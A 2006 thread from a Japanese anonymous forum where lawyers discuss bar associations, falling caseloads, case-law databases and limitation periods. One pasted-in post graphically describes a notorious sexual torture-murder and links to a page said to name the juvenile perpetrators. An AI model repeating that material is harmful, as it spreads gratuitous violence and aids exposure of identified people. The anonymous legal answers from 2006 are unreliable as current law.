465 :無責任な名無しさん:2006/04/04(火) 02:10:05 ID:piE7zr1I
乗鞍岳弁護士会
りゃくして のり弁

466 :無責任な名無しさん:2006/04/04(火) 07:24:59 ID:8nPGNYB3
法律事務所「西村ときわ」と「あさひ・狛」が合併・国内最大に
http://www.nikkei.co.jp/news/main/20060404AT3Y0300303042006.html

467 :無責任な名無しさん:2006/04/04(火) 10:21:53 ID:NYdp041Q
近畿弁護士連合会
略して きべん


468 :無責任な名無しさん:2006/04/04(火) 12:16:11 ID:P/kj60dX
うそくせ〜。なんか、うそくせ〜。

469 :無責任な名無しさん:2006/04/04(火) 15:13:45 ID:vBD4zsfL
>>468
きんべんの方が嘘くさくない?

470 :無責任な名無しさん:2006/04/04(火) 15:28:21 ID:3s45bQjy
兵庫県弁護士会

ひべん

471 :無責任な名無しさん:2006/04/04(火) 15:37:30 ID:aOc3LbV3
きんべんれん

472 :無責任な名無しさん:2006/04/04(火) 16:04:29 ID:Ha1pfS0w
かんべんれん
勘弁連

473 :無責任な名無しさん:2006/04/04(火) 16:45:29 ID:lthr/Ibn
大弁 DB 
東京第二弁護士会 TDN弁護士会
アッー!

474 :無責任な名無しさん:2006/04/04(火) 17:20:31 ID:dOD82aEw
そろそろ、話を戻さないかい?

475 :無責任な名無しさん:2006/04/04(火) 18:56:15 ID:NrBjvvst
最近仲の良い弁護士に聞くとみんな仕事が減ってるみたい。
皆さんの所はどうですか。
新人の就職や若手の独立にも影響を及ぼしそうです。

476 :無責任な名無しさん:2006/04/04(火) 19:06:43 ID:8Bgw/Fh5
イソ弁ですが、最近、ちょっと
仕事が楽になりました。


477 :無責任な名無しさん:2006/04/04(火) 19:36:42 ID:dOD82aEw
>>475

弁護士の数は増えて、仕事のパイはどんどん縮小しているのだから、
そりゃそうでしょうね。

478 :無責任な名無しさん:2006/04/04(火) 20:42:01 ID:bhrzh3Ej
 支部弁護士ですが、弁護士数の増加はありませんが、仕事は減っています。
 理由は、個人の破産、債務整理が1年前と比べても著明に減少しているからです。
 当地の景気が良くなったという実感は全くありません。また、当地の司法書士は破産はほとんどやりません。
 破綻すべき人があらかた破綻し終わったのではないかと思います。
 一方で、破産数年後、ヤミ金に手を出す人はいますが、田舎なので業者が乗り込んでくることもなく、ある程度であきらめるようです。

479 :無責任な名無しさん:2006/04/04(火) 22:31:37 ID:PpBak1fn
なぜ、あさひ独楽は西村と合併するの?
三井安田のような状態になってしまったんだろうか?

480 :無責任な名無しさん:2006/04/04(火) 22:39:58 ID:gUNgTwt3
>>473
でおまえは非弁というオチかw

>>479
俺もびっくりした。
そこって空中分解したんじゃなかったっけ?

481 :無責任な名無しさん:2006/04/04(火) 22:40:47 ID:dVy/poLw
事務所名はどうすんだろう
なんか舌をかみそうな長いのになる希ガス

482 :無責任な名無しさん:2006/04/04(火) 22:45:21 ID:QWD/CAqr
パイが減少することは本当に悪いことなんでしょうか?
ビジネスの世界で考えると、パイが減少すると、まず、弱い企業が淘汰されます。
そして、残った企業が、その空いた部分を総取りします。

かつてアメリカにはたくさんの自動車会社がありましたが、不況の影響で弱小メーカーは淘汰されました。
その結果、GM、フォードなど強者による寡占化が進んだのです。

483 :無責任な名無しさん:2006/04/04(火) 22:48:49 ID:AJebSl1j
>>482
弁護士業は業務を効率化しにくい分野
例外がクレサラ事件くらいか?
クレサラ専門事務所ができて効率的な業務運営により収益をあげている
でもパラリーガルに業務を行わせているケースが多いと思われるのでグレーゾーン

484 :無責任な名無しさん:2006/04/04(火) 22:49:22 ID:LyWyPpTt
そのGMやフォードが現在どうなっているか(以下ry)

485 :無責任な名無しさん:2006/04/04(火) 23:43:58 ID:bhrzh3Ej
 保全申立書の起案があらかた終わった。後は、陳述書だけ。
>483
 ロースクール卒の弁護士が増えてきたら、弁護士になったら将来は当然に独立ということも無くなるのではないでしょうか。
 そんでもって、既存の有力な弁護士が、従業員弁護士を従来より安く雇って、こき使って、上前をはねるという効率化が進むのでは?
 そうすると、医者の世界のように、大きな病院と個人医院へ二極化していくのではないでしょうか。
 個人医院でも、評判が良くて、繁盛しているところはあるので、努力次第なのでしょうね。
 弁護士の数が増えれば、日医連のような圧力団体になれるのでしょうか?

486 :無責任な名無しさん:2006/04/05(水) 00:54:02 ID:lt1nP6TM
ただ,各院の法務委員会が弁護士ばかーりなように
弁護士の国会議員はかなりいるみたいだよね
非弁提携(上がりピンはね)で起訴もいたし
なのに全然圧力団体にすらならない
裁判員の定員を増やすこと以外は

487 :無責任な名無しさん:2006/04/05(水) 01:14:19 ID:MUMz2pr4
それすら圧力と呼べるほどの力もない・・・

488 :無責任な名無しさん:2006/04/05(水) 02:04:32 ID:EZ6I+Av2
強制加入団体の弁護士会ではなく、
政治団体としての任意団体弁護士友の会とかができれば、
圧力になりうるんじゃない?

489 :無責任な名無しさん:2006/04/05(水) 03:54:38 ID:yRATS8gI
弁政連はすでにある

490 :無責任な名無しさん:2006/04/05(水) 04:05:09 ID:1ffdi/rV
会長が贈賄で捕まるぐらいでないと圧力はきかないだろうね

491 :無責任な名無しさん:2006/04/05(水) 10:21:49 ID:eqJdTr2J
頭の固い、守旧派の弁が職域を狭めている。
サービサーなんてのは、本来弁が全部独占して作るべきだった。

492 :無責任な名無しさん:2006/04/05(水) 21:20:36 ID:LYHaqQsK
>>491

同意。

老害どもは、いい加減、排除すべきだと思う昨今です。

バカ高い会費だけ徴収され、仕事だけは減っている現
状ですから。

493 :無責任な名無しさん:2006/04/05(水) 22:23:19 ID:CblDJXo4
皆様判例データベースはどこの製品を利用されていますか?
おすすめがあったらご教授願います

494 :無責任な名無しさん:2006/04/05(水) 22:33:46 ID:hMjliQTv
判例秘書。最高裁も使ってると営業マンが言ってた。


495 :無責任な名無しさん:2006/04/05(水) 22:39:45 ID:TWqOsEl3
一番使えないのが判例マスター。
商品として存在することが
信じられないくらいの劣等品です。


496 :無責任な名無しさん:2006/04/05(水) 22:42:46 ID:CblDJXo4
判例マスターは安いというメリットがあるんでは?

497 :無責任な名無しさん:2006/04/05(水) 22:52:15 ID:DJjIuj4s
今の時代に判決文が全文出てこない代物じゃねえ。

これで半期分4万以上取られるのだから、立派なボッタクリ。



498 :無責任な名無しさん:2006/04/05(水) 22:56:46 ID:hMjliQTv
TKC使ってる人いる?
従量料金がえらく高いんだけど、弁護士業務には不向きかね。

499 :無責任な名無しさん:2006/04/05(水) 23:14:09 ID:CblDJXo4
判例時報の掲載判例が一番多く載っているDBはどれでしょうかね?

500 :無責任な名無しさん:2006/04/05(水) 23:36:38 ID:hMjliQTv
俺は判例秘書つかってるが、判例時報はDB・PDFされてない。掲載号はのってるのでそれを手がかりに
自分で、雑誌を探すしかない。

501 :4*期 ◆QjgjfGgbvE :2006/04/06(木) 00:41:41 ID:qOttJ1v2
判例時報は,社長が「俺の目の黒いうちはDVDになんかさせない」と言ったとか。
まぁ判例そのものはテキストデータになってますが,囲み部分とかは雑誌にあたる必要がありますね。
あと判例評論とか,論文とか。


502 :無責任な名無しさん:2006/04/06(木) 01:29:23 ID:hTFEh+mr
判例時報はホームページもないくらい、デジタルが嫌い。

503 :無責任な名無しさん:2006/04/06(木) 05:59:06 ID:LWvtqzBY
 O弁護士が最新号の児童福祉法の判決について書いてたけど、
 判例時報の囲みの説明はやっぱり、担当裁判官?
 高裁の刑事判決で、裁判官も悩んでる・困ってる・わからないというのは始めて見たよ。



504 :無責任な名無しさん:2006/04/06(木) 09:57:48 ID:0c3WDury
 判例秘書は便利だけど、個人事務所で使う場合は費用対効果はどうだろう?
 あれって、いくらぐらいするのだろう?
 判例マスターのweb版は、効果も限定的だが、月五千円と費用も限定的です。

505 :無責任な名無しさん:2006/04/06(木) 12:45:53 ID:nkrlOYXp
判例秘書ってPDFも付いているんだ。それはいいね。
でも、判例秘書は月3万とか5万とか聞いて(オプションによって金額が違うと
聞いた)、弁護士一人事務所では経費負担が大きすぎると思って止めた。
うちも判例マスターwebだけど、金額低いのを考慮すれば、まあいいと思う。
有名どころの判例なら全文出てくるし、雑誌見ないと分からないのはコピー
してくればいいしね。

506 :TN:2006/04/06(木) 13:33:39 ID:fXl7YmO1
私も判例マスター(但し製品版)
web版より初期投資は必要だけど年2万プラスで済むしね
うちも一人事務所だからあまり経費はかけたくないし,
幸い弁護士会に行けば判例時報がそろってるしね
ちなみに判例マスターは私が弁護士になりたての頃に判例検索システムとして始めて製品化されたもので,
当時のボスが新しもの好きだったためもあり,当時からずっと使ってる

最近ヒマで,のどかな春の日を楽しんでます

507 :無責任な名無しさん:2006/04/06(木) 13:37:31 ID:y7UzlF4I
1人事務所の皆さん、雑誌は何とってますか?

508 :無責任な名無しさん:2006/04/06(木) 15:10:46 ID:F7jgT9lZ
実話時代と週間実話

509 :無責任な名無しさん:2006/04/06(木) 15:27:59 ID:mj+neRlm
○B弁護士?

510 :無責任な名無しさん:2006/04/06(木) 22:54:55 ID:tmIHyM6h
>>508
やーさん関係の人ですか?

511 :無責任な名無しさん:2006/04/06(木) 23:38:03 ID:hcHDLuyT
修習生のころ、民弁教官のつてで当時のRCCの事務所を見学に行ったとき、
実話時代が揃えて置いてあったのを見て驚いたことを思い出した。

512 :無責任な名無しさん:2006/04/06(木) 23:41:30 ID:tmIHyM6h
Pも,実話系を定期購読してるからね。

513 :無責任な名無しさん:2006/04/07(金) 17:34:04 ID:gTVmaNuI
俺も実話系すき。
国選の被告人がヤクザだと結構ねほりはほり聞いているなw
上納金とかシノギのこととか。

514 :無責任な名無しさん:2006/04/07(金) 19:09:49 ID:gmeGhZIR
28 名前:氏名黙秘[sage] 投稿日:2006/04/07(金) 19:04:52 ID:???
産科・小児科医療崩壊は医療訴訟が原因
http://academy4.2ch.net/test/read.cgi/jurisp/1139405334/

638 名前:法の下の名無し[] 投稿日:2006/04/07(金) 17:29:26 ID:im09Uq1J
暴対法によって、やくざ総会屋に流れていた、総会対策費用は
ほぼ、そのまま、弁護士業界に流れていったと揶揄される。

無理解なクレーマー患者による医療訴訟や、検察による不当逮捕
(明らかな医療過誤を除く)による医療従事者側の損害を
防止予防するには、やはり弁護士業界に顧問費用として日常的に
大金を払うしかないのではないかと思う。

弁護士に払った方が、不当な金を支払うよりも、より良い経済効果
を生むのではないか?それで医師と弁護士との共闘を願う。

by(最初は、法曹関係者全てが憎かった医師)

515 :無責任な名無しさん:2006/04/07(金) 19:23:59 ID:IMTV61sU
>>513
上納金とかシノギのことを聞いてそれなりに興味のある答えが
返ってくるような人は、国選なんか頼まないのでは。

516 :無責任な名無しさん:2006/04/07(金) 19:53:47 ID:TscGqJ4l
最高裁の判例検索、いつのまにかPDFになってるね。

517 :TN:2006/04/07(金) 21:13:37 ID:rELrZttM
>>515
893は計算高いから国選と私選をうまく使い分けてるよ

518 :無責任な名無しさん:2006/04/07(金) 22:29:15 ID:MLE6aGhc
なぜ何もしないという選択を怖がるのだろう?
既成事実を作りやることをやったと証明するためでいいのだろうか?
本当にクライアントのことを考えるのなら動かない勇気がほしい。
風林火山。4つを使い分けてこそ本当の戦略が立てられるのに…

519 :無責任な名無しさん:2006/04/07(金) 22:32:46 ID:MLE6aGhc
さげ

520 :無責任な名無しさん:2006/04/07(金) 22:34:50 ID:VeG385Vz
判例タイムズと金法を定期購読してます

521 :無責任な名無しさん:2006/04/08(土) 01:36:51 ID:Iq19tyEp
神奈川県貸金業協会がまたやってくれました。
http://www.k-kasikin.or.jp/20060404seimei.html

522 :無責任な名無しさん:2006/04/08(土) 10:27:15 ID:dpJbSp1+
SFCGなんかは、取り引き履歴の送付のtきに、いまだにみなし弁済主張する書面送ってくるからなあ。
まあ、自己破産だからあえて争わんけどさ。債務整理なら、訴訟で争わざるをえんのかな。

523 :無責任な名無しさん:2006/04/08(土) 11:56:30 ID:mrsFpiXw
つーか、未だに履歴の開示を渋る業者が多いわけだが・・
サラ金必死だなw

524 :無責任な名無しさん:2006/04/08(土) 17:03:03 ID:cbFjT+cO
すみません。
知り合いの弁護士さんが県弁護士会の副会長になりました。

これって出世なんですか!?

525 :無責任な名無しさん:2006/04/08(土) 17:27:55 ID:R8AlI/rM
会員何人の単位会なんだよ?


526 :無責任な名無しさん:2006/04/08(土) 17:44:31 ID:BGDOiJs8
県ならどうってことない。

527 :無責任な名無しさん:2006/04/08(土) 17:46:22 ID:30zjtx8f
  弁護士と少年犯罪者は事後共犯か?
女子高生が、夜8時過ぎ帰宅中、足立区綾瀬の少年らに誘拐されて40日間監禁、
陵辱の限りを尽されて殺害された。少年らは、女子高生を全裸で踊らせ、体にオイル
を塗って火を着け、熱さに悶え苦しむのを見て笑い、性器に棒を押し込み陵辱した。
 女子高生コンクリート詰め殺人事件 http://www8.ocn.ne.jp/~moonston/lynch.htm
 (表示画面の最後。性器を灰皿代わりにしたことなどを記載)
犯人の実名  http://www.geocities.jp/zenbo2005/  

主犯以外の犯人の服役期間は、未決勾留期間を除き全て6年程度であった。
出所後は、再犯する者、犯行を自慢する者などが多く、社会復帰した者も
「事件は済んだことであり、自分たちは無関係」と発言している。
主犯については、刑期満了以前の仮保釈が準備中であるという。
司法関係者の犯罪被害者への配慮は少なく、今の法務大臣でさえ「凶悪犯罪に
裁判所が死刑判決をしても、自分は死刑執行を許可しない」との態度を取っている。


528 :524:2006/04/08(土) 19:21:18 ID:5kKwE9u8
>>525-526
会員数は、いわゆるイソ弁あわせて120人前後だと思います。

529 :無責任な名無しさん:2006/04/08(土) 20:02:05 ID:78LBfwA5
ライブドア被害弁護団

http://www.livedoor-higaibengodan.jp/index.htm
http://www.livedoor-higaibengodan.jp/housin.htm

資料請求をし,かつ,弁護団が原告として参加して良いとの連絡がない限りダメ。

少なくともHPを立ち上げているのだから,
資料内容をHPで知らせるべきじゃないか?

資料請求する資格が限定されていないから,秘密保持は理由にならないし,
1人1000円で5000人来れば500万でしょ。
ボロ過ぎじゃないか?



530 :無責任な名無しさん:2006/04/08(土) 21:24:34 ID:ihqvysJs
ぼくは、弁護士になったときは、世の中を1ミリづつでもよくするために地道に努力していこうと決意した。
ところが、弁護士活動に入ってみると日弁連においても単位弁護士会においても
党員であることを秘した共産党の人々が強固な組織的活動をもって弁護士会を牛耳ろうとし、
そこへ新左翼の人々が加わって、弁護士会は「人権擁護」という看板のもとで
政治イデオロギー闘争の場となっていた。


531 :無責任な名無しさん:2006/04/09(日) 00:05:26 ID:NU7ZtNjZ
>>528
そのくらいの単位会なら、副会長ってのは忙しいだけのみんなが嫌がる仕事で、会にもよりますが10年程度で順番に回ってくる仕事です。

532 :無責任な名無しさん:2006/04/09(日) 01:55:34 ID:Dk3I4YF8
弁護士をやっててやっぱ後味が悪いときとかありますか?

533 :無責任な名無しさん:2006/04/09(日) 02:20:50 ID:FEG2qf62
 博多に事務所を置いている人たちは,「博多弁護士会」という団体を
作っていて「俺たちは福岡県弁護士会とは違う」と述べているそうだが
本当か?

534 :無責任な名無しさん:2006/04/09(日) 02:21:23 ID:sNa1Vewv
>>521
 ワロタ,まさに負け犬の遠吠えだな。
 ただ日弁連会長声明もこういう目で見られてるんじゃないかと思う時がたまにある。

535 :sage:2006/04/09(日) 03:07:54 ID:FEG2qf62
 当会では,いわゆる「ヒラ副会長」は登録8−10年目くらいに就任しますが,次期会長と目される人が「筆頭副会長」
になります。年配弁護士への苦情処理とかが仕事です。

536 :sage:2006/04/09(日) 03:19:43 ID:FEG2qf62
>507
法学協会雑誌・刑法雑誌・前進・しんぶん赤旗日曜版・プレジデント


537 :524:2006/04/09(日) 08:44:03 ID:7X0jYo5U
>>531
そうだったんですか!?
選挙で選んでいるみたいなので、一応栄転(?)だと思ったのですが。

538 :無責任な名無しさん:2006/04/09(日) 09:01:07 ID:uKoJA46Q
選挙という名の押し付け合い。

539 :無責任な名無しさん:2006/04/09(日) 10:29:28 ID:znDQpjzW
でもね、地方会の会長とか
弁連の役員とかになると、
叙勲されるのよ。



540 :無責任な名無しさん:2006/04/09(日) 12:58:53 ID:1cOtJxJv
200人以下の規模なら、会長ぐらいなりたい人なら誰でもなれる

541 :無責任な名無しさん:2006/04/09(日) 13:21:19 ID:P9axxA2v
>>504
 なりたい人なんていないよ。司法修習生は今までの4倍になるし,国選被
疑者弁護やら司法改革やらで,みんな大変な思いをしている。
 勲章といっても昔で言う勲4等でしょ。簡裁判事とおなじだし,叙勲祝い
とか大変だし,結構辞退している人が多い。

542 :無責任な名無しさん:2006/04/09(日) 14:19:25 ID:2kZoh+gm
>>530
はっきり言って、それを知らないのは無知。
少なくとも修習中には気が付くでしょう。

543 :無責任な名無しさん:2006/04/09(日) 14:35:10 ID:TeMhjFfv
弁護士さんて弁護士の資格以外にどんな資格持ってますか?
英字新聞くらい読めて当然、弁護士以外の国家資格の3つ4つ持ってて当然、
という頭脳集団ですか?

すいません、自分とは無縁の世界なので興味が湧きました。
もしよければ教えて下さい。

544 :無責任な名無しさん:2006/04/09(日) 14:51:56 ID:gdhZmd26
税理士と司法書士と海事代理士は登録する資格もってるよ。

545 :無責任な名無しさん:2006/04/09(日) 14:55:11 ID:P9axxA2v
>>543
 マンション管理士。医師とか一級建築士とかの資格を持っている人もいないわけではない。
 ちなみに博士(法学)を持っている人はほとんどいない。せいぜい,修士だね。

546 :無責任な名無しさん:2006/04/09(日) 14:58:59 ID:P9axxA2v
 私は「警備士」の資格を持っていたように記憶している。受験生時代のアルバイトで資格を取得した。
あとは,勝負師とかファイナンシャルプランナーとか・・・。

547 :無責任な名無しさん:2006/04/09(日) 15:00:53 ID:uKoJA46Q
今後は、修士がデフォルトか。

548 :無責任な名無しさん:2006/04/09(日) 15:03:01 ID:kDdNmeGd
>>547
法務博士でしょw

549 :無責任な名無しさん:2006/04/09(日) 15:07:46 ID:44izbrcs
>>541
それがいるんだな。
なりたいというと図々しく思われるからなりたくない振りしてるだけ。
なりたい人は顔見りゃわかる。

550 :無責任な名無しさん:2006/04/09(日) 15:53:04 ID:P9axxA2v
>>543
 牧師・お坊さん・神主・社会科・数学科の先生は結構いる。私の知り合いの同業者は,医学部入学後司法解剖で卒倒し,理学部に入り直して,高校の先生をしていたらしい。


551 :543:2006/04/09(日) 15:58:01 ID:TeMhjFfv
弁護士のみなさん回答ありがとうございます(・∀・)
結構人によって持っている資格に幅があるんですね。
弁護士の資格以外はなーんも持ってないなんて人も中にはいるんでしょうか。
司法試験に受かるための勉強しかしてこなかった、みたいな。
個人的には、そんなギリギリ極限状態の人は司法試験に受からなさそうなイメージがありますが。

全然関係ないですが、去年地元の弁護士さんにお世話になりました。
話を聞くのが上手い人だったので、聞いてもらうだけでもすごく安心しました。
そういう対人スキルも必要なんですね、大変そうですががんがって下さい。

552 :無責任な名無しさん:2006/04/09(日) 16:35:30 ID:uO5tyS8L
>>549
どういう顔?

553 :無責任な名無しさん:2006/04/09(日) 16:36:20 ID:uO5tyS8L
>>551
釣り?

554 :無責任な名無しさん:2006/04/09(日) 17:19:58 ID:nTOMcB+f
お前も頑張れよ。
っていうか、お前が頑張れよと言いたい。

555 :無責任な名無しさん:2006/04/09(日) 17:37:54 ID:bo4w2vlU
日々が虚しく過ぎて行くような気がする。
依頼者に「ありがとうございました」って言われるとそれはそれで嬉しいんだが。

もう辞めたい。
疲れた。

556 :無責任な名無しさん:2006/04/09(日) 18:37:05 ID:SpUXjKoU
>>555
しばらく休んだらどう?
イソ弁なら復帰はそれほど難しくはない。
独立しているとちょっと大変かもしれないが、首くくるよりはマシと思われ。

557 :524:2006/04/09(日) 19:09:47 ID:n6rORPxw
>>538
本当なの???

558 :無責任な名無しさん:2006/04/09(日) 19:15:21 ID:CisR1adj
>>555
おれも、自分はいったい日々何をやっているんだろうと思うことがよくある。
客観的に見れば、本当に困ってる依頼者を助けてることも多々あるんだろうが、
なんか、それも日常のことで慣れてしまってそれほどの感動もない。
でも、食って行くにはとりあえず働くしかない。
同じくらいの期の弁護士と話してると、同じような感じの人がけっこう
いるのが救いというか、何というか。

559 :無責任な名無しさん:2006/04/09(日) 19:15:25 ID:229thM3t
会長はともかく副会長は完全な雑用。
しかし会長になるなら必要な経歴。


でも会長なんてなりたくないよな。

560 :無責任な名無しさん:2006/04/09(日) 20:17:54 ID:bajdn8jb
まあ,田舎の単位会で,副会長を飛ばされるというのも
何となく格好悪いな。

雑用やらなくて済んだと割り切ればいいのだが。

561 :無責任な名無しさん:2006/04/09(日) 21:44:47 ID:JSaauXhu
俺のいる会で副会長飛ばされるのは、
懲戒歴のある香具師だけだぜ。


562 :無責任な名無しさん:2006/04/09(日) 22:38:21 ID:SpUXjKoU
>>561 会員数は何十人台?

563 :無責任な名無しさん:2006/04/09(日) 23:07:53 ID:uO5tyS8L
>>560
都内の派閥内のポストみたいになってるのか
なるほど

564 :無責任な名無しさん:2006/04/10(月) 01:24:08 ID:QTTdhTWC
>>544
書士の仕事はできるが、書士って登録できないって聴いたことがあるけど。
書士法とかで確認はしていないんだけど。


565 :無責任な名無しさん:2006/04/10(月) 02:12:19 ID:aW9NhRYg
司法書士法
(資格)
第四条  次の各号のいずれかに該当する者は、司法書士となる資格を有する。
一  司法書士試験に合格した者
二  裁判所事務官、裁判所書記官、法務事務官若しくは検察事務官としてその
 職務に従事した期間が通算して十年以上になる者又はこれと同等以上の法律に
 関する知識及び実務の経験を有する者であつて、法務大臣が前条第一項第一号
 から第五号までに規定する業務を行うのに必要な知識及び能力を有すると認め
 たもの

2号の運用次第だがある程度(最長10年)の経験を積んだ弁護士なら法務大臣
の認定を受けられそうだ。そこまでして登録するメリットがあるかは知らないが。

566 :無責任な名無しさん:2006/04/10(月) 09:44:42 ID:cXECJFHk
登記の仕事は代理人弁護士でできるんだから、登録するメリットは
ないと思うけど。
ただ、司法書士会は政治力があるから、登録をしておけば何かといい
ことがありそうだ・・・。

567 :無責任な名無しさん:2006/04/10(月) 10:04:23 ID:TDyWP2VY
>>561
うちの会では不思議と副会長経験者が懲戒される

568 :無責任な名無しさん:2006/04/10(月) 10:41:32 ID:QeAGeLlK
一級交尾士

569 :無責任な名無しさん:2006/04/10(月) 16:18:57 ID:eeWcxkPx
地域限定になるが、今回の関弁連だよりにでてた
静岡の半隠居先生の一週間がなんか面白かった。
もういっこのは同期だ。

570 :無責任な名無しさん:2006/04/10(月) 16:22:34 ID:KYu6ms8R
脳みそスカスカ

571 :無責任な名無しさん:2006/04/10(月) 17:40:32 ID:KYu6ms8R
マジ、すみません。
訴状の正本には、割印を押すのでしょうか?

572 :無責任な名無しさん:2006/04/10(月) 17:44:32 ID:KYu6ms8R
マジ、すみません。
今解決しました。

573 :無責任な名無しさん:2006/04/10(月) 18:04:31 ID:NAY9vgRZ
>>570は自分の事だったのかw

574 :無責任な名無しさん:2006/04/10(月) 19:31:16 ID:C6vRSTXj
>税理士と司法書士と海事代理士は登録する資格もってるよ。
明文あるのは、税理士と弁理士と社会保険労務士と行政書士くらいじゃないか?
司法書士と海事代理士は判例でもあるのか?
http://law.e-gov.go.jp/htmldata/S26/S26HO032.html
(資格)
第二条  左の各号の一に該当する者は、海事代理士となる資格を有する。
一  海事代理士試験に合格した者
二  行政官庁において十年以上海事に関する事務に従事した者であつて、その職務の経歴により海事代理士の業務を行うのに十分な知識を有していると国土交通大臣が認めたもの


575 :無責任な名無しさん:2006/04/11(火) 00:07:58 ID:+UTENLZs
司法書士業務は、登録できる明文はなかったと思う。
弁護士が、司法書士業務ができるのは判例があった

576 :無責任な名無しさん:2006/04/11(火) 08:38:37 ID:CFQjsUfm
井上判事が退官
ttp://headlines.yahoo.co.jp/hl?a=20060411-00000013-kyodo-soci

報道されていない再任拒否者もいるようだね。
ヤメ裁を事務所に入れるときは、
最後の任地での評判くらい調べておくのが必須だな。


577 :無責任な名無しさん:2006/04/11(火) 08:59:39 ID:JBju1Lh9
>>575
この裁判の中で、司法書士会側が、弁護士は司法書士に登録したら
司法書士業務ができると主張してたと思う。

578 :無責任な名無しさん:2006/04/11(火) 09:05:55 ID:/6Sa1AM/
弁護士の資格から当然に、という意味のレスじゃなくて、
「司法試験受かる前に司法書士の資格取ったからなろうと思えばおれはなれるよ」
程度の意味のレスだったんじゃね?

579 :569:2006/04/11(火) 15:51:51 ID:F4gkxpFo
>>570
それw

580 :無責任な名無しさん:2006/04/11(火) 18:19:10 ID:oSy/Jb6l
除斥期間が経過すれば権利が消滅するものだと思うけど、除斥期間内に
その権利を行使さえすれば、あとは権利が保存されて、以後通常の消滅
時効にかかるという理解でいいの?
(瑕疵担保責任や遺留分請求なんかはそうだったような?裁判でなく、とりあえず
内容証明で請求でもOKだったような気がする)

いくら何でも、その除斥期間内に提訴しているのに、裁判中に除斥期間が
経過しちゃったら、はいそれまでよ〜にはならないよね?
不法行為損害賠償請求で20年経過で切られた判例って、20年経過後に
提訴(or請求)したからダメっていう意味で、裁判経過中に20年過ぎちゃったから
敗訴になったわけじゃないんだよね?

ちょっと今、判例も文献も見られないところにいるけど、早急に知りたいので、
もし誰か分かったら教えてください。

581 :無責任な名無しさん:2006/04/11(火) 19:35:52 ID:57y+TDs5
県警、地検、地裁がミス 少年を2日間勾留 栃木
2006年04月11日19時07分
 栃木県警に軽犯罪法違反容疑で現行犯逮捕された少年(19)が、過って2日間勾留(こうりゅう)されていたことが11日わかった。
少年法は罰則が罰金以下の刑の犯罪の場合、少年は勾留せずに家庭裁判所に送らなければならないと定めており、
勾留せずに家裁に送致しなければならなかったのに、県警と宇都宮地検、宇都宮地裁の3者がいずれも誤りに気づかなかった。県警は今後、少年に謝罪するとしている。

これって、勾留状を発布した裁判官が、少年の所へ出向いて土下座で謝罪をした上で、
最高裁に辞職願を提出するべきもんではないでしょうか。
警察や検事は、その裁判官に過誤の端緒を提供したから「スマンネ」と言えば済むことでは?
弁護士各位の忌憚のないご意見を。

なお、私見では「バカ揃いの無責任なカンパンなら、『アーまたやっチャッタね』だけで済むが、
正規の資格を有しているはずの地裁裁判官の勾留命令には、それでは済まない重いものがあるのでは・・・?と。

582 :無責任な名無しさん:2006/04/11(火) 19:42:40 ID:TlgaEySH
大阪です。

デモが五月蝿くて、起案できません。
むかつきます。

583 :無責任な名無しさん:2006/04/11(火) 19:50:18 ID:llQGhzts
>>580
除斥期間は中断しないし、原則として停止もしない。
内容証明で請求しても中断も停止もしないから意味無し。
期間内に訴え提起すれば、その後除斥期間が経過したとしても
期間内の請求だから除斥を理由に敗訴したりはしない。

遺留分請求は形成権だから。
形成権の行使によって初めて権利関係が確定し、その時点から改めて時効が進行する。

584 :無責任な名無しさん:2006/04/11(火) 20:50:27 ID:+WuVOzHY
マジ、すみません。
個人情報保護法関連でおすすめの書籍ってありますか?

585 :無責任な名無しさん:2006/04/11(火) 20:52:43 ID:vq+svTN0
>>584
岡村久道「個人情報保護法の知識」(日経文庫)
http://www.amazon.co.jp/exec/obidos/ASIN/4532110483/250-9224016-3909864

586 :無責任な名無しさん:2006/04/11(火) 21:05:47 ID:+WuVOzHY
さっそくありがとうございます。
読んでみます。

587 :無責任な名無しさん:2006/04/11(火) 23:23:40 ID:UiAD1/q8
呆照らす始まったね。
さて、弁護士業務にどう影響がくるのやら。

588 :無責任な名無しさん:2006/04/11(火) 23:48:55 ID:Eeh1bDy4
>>584
この法律で大切なことはただ一つ。
個人情報はどんどん捨てさせろ。そうすればこの法律の枠外だw

589 :580:2006/04/12(水) 09:25:13 ID:LhFivo1d
>583
どうもありがとうございます。
昨日は判例付きの六法しか手元になかったので助かりました。
除斥期間は中断・停止しないというのは知っていましたが、それ以外のことをよく覚えていなかった。
民法564条の1年について、該当判例見ると、裁判外の請求でも効力を生じてその後に提訴しても
良いような趣旨の判例が書いてあるし、566条3項にも最高裁判例があって、この1年は除斥期間だと
しながら、「この損害賠償請求権を保存するには売り主の担保責任を問う意思を裁判外で明確に告げる
ことをもって足り、裁判上の権利行使をするまでの必要はないと解するのが相当」などと書いてあって、
結局除斥期間内に内容証明等で意思を伝えておけば権利が保存されてそこから消滅時効が進行すると
いう理解でいいのか?
でも除斥期間経過を理由に損害賠償請求を棄却した判決も聞いているし、結局どうすればいいんだ?と、
よく分からなくなってしまってました。
理論的には理解しきれていませんが、とりあえず安全に期間内に提訴をしておこうと思います。

弁護士になってから、じっくり調べる暇がなくて、とりあえず安全に安全にという風になってしまった。
下手なこと言って間違ってたら懲戒ものだしなあ。

590 :無責任な名無しさん:2006/04/12(水) 10:34:31 ID:zBjejIRP
>>589
その辺は内田民法に詳しく書いてあった気がする
まあ、でも、安全にいけるならその方が気持ちは楽だよな

591 :無責任な名無しさん:2006/04/12(水) 15:07:06 ID:AmUNE5Ns
そうだよ。不定期間なんかは初日算入不算入でなやむのがいやだから2日前には出しておいた方が精神衛生上いい。

592 :無責任な名無しさん:2006/04/12(水) 18:21:16 ID:D18CYPor
それがそう簡単に行かないのがつらいところだ

593 :無責任な名無しさん:2006/04/12(水) 21:19:22 ID:hKjy49eV
とにかく、むつかしいが、やるべきことは1週間前に済ませるようにしましょう。

後輩のイソ弁がこれを十二分に実行しているのを見てから、わたしも努力するようになりました。
それ以後、少しは酒量が減りました。

でも、人の世の中、私も含め、先憂後楽を実行できない人が少なくない。
司法試験合格も、それぞれ1年の差くらいは、これが影響していると思う。


594 :無責任な名無しさん:2006/04/12(水) 21:56:03 ID:T8u8UN/g
俺も明日からやろう

595 :無責任な名無しさん:2006/04/12(水) 23:07:33 ID:zG3JnJET
おれは明後日からやる

596 :無責任な名無しさん:2006/04/13(木) 00:00:02 ID:3nivllcP
おれは来週からやる。

597 :無責任な名無しさん:2006/04/13(木) 00:29:29 ID:RFDHE0dB
俺はゴールデンウィークまで楽しい行事が入っているから、それが終わったらやろう

598 :無責任な名無しさん:2006/04/13(木) 00:46:05 ID:6cmjy/A2
おれは来世から

599 :無責任な名無しさん:2006/04/13(木) 02:02:18 ID:78+DeM+o
おれは無理だから子どもにはそう教育しよう
